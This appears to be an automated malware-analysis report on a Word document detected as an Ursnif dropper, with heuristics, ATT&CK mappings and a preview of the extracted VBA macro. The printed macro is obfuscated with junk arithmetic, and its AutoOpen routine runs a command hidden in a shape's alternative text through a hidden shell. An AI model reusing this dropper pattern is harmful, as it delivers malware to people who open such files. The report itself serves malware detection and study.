MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Ursnif-6864686-0. Static analysis revealed a VBA macro with an AutoOpen subroutine. This macro uses Interaction.Shell to execute a command, likely to download and run a second-stage payload. The presence of the Ursnif signature strongly suggests this family.
Heuristics 5
-
ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1324 bytes |
SHA-256: 0ce3a514373673d552d2030ced69d3cfe358ba1f278b4f657632d0cadd49a37b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lsorefy" Function lcadorukun() Dim LSJZOCa As Integer Dim IwedqXsH As Long LSJZOCa = 6484# - 3801# Dim LAcDBzSK As Variant LAcDBzSK = LSJZOCa - 6837# Dim EGvBmh As Integer Dim wcuwuqumiki As Long EGvBmh = 4592# - 9665# Dim gurTPz As Variant gurTPz = EGvBmh - 9115# Set lcadorukun = ActiveDocument.Shapes(2) Dim bkifyk As Integer Dim qSCWTbtD As Long bkifyk = 7157# - 9656# Dim IhWgo As Variant IhWgo = bkifyk - 5583# End Function Sub AutoOpen() Set DYEFyU = lcadorukun zcuci = lcadorukun.AlternativeText Dim bxibyxopi As Integer Dim dxijas As Long bxibyxopi = 4750# - 1352# Dim wxoxusu As Variant wxoxusu = bxibyxopi - 3022# Dim kpaxewu As Integer Dim VNdTFbjn As Long kpaxewu = 8706# - 4934# Dim xcojomigifo As Variant xcojomigifo = kpaxewu - 9146# Interaction.Shell@ _ zcuci, vbHide Dim cbmeknC As Integer Dim yFNwpctZ As Long cbmeknC = 1006# - 5012# Dim rvhSwbF As Variant rvhSwbF = cbmeknC - 2849# End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.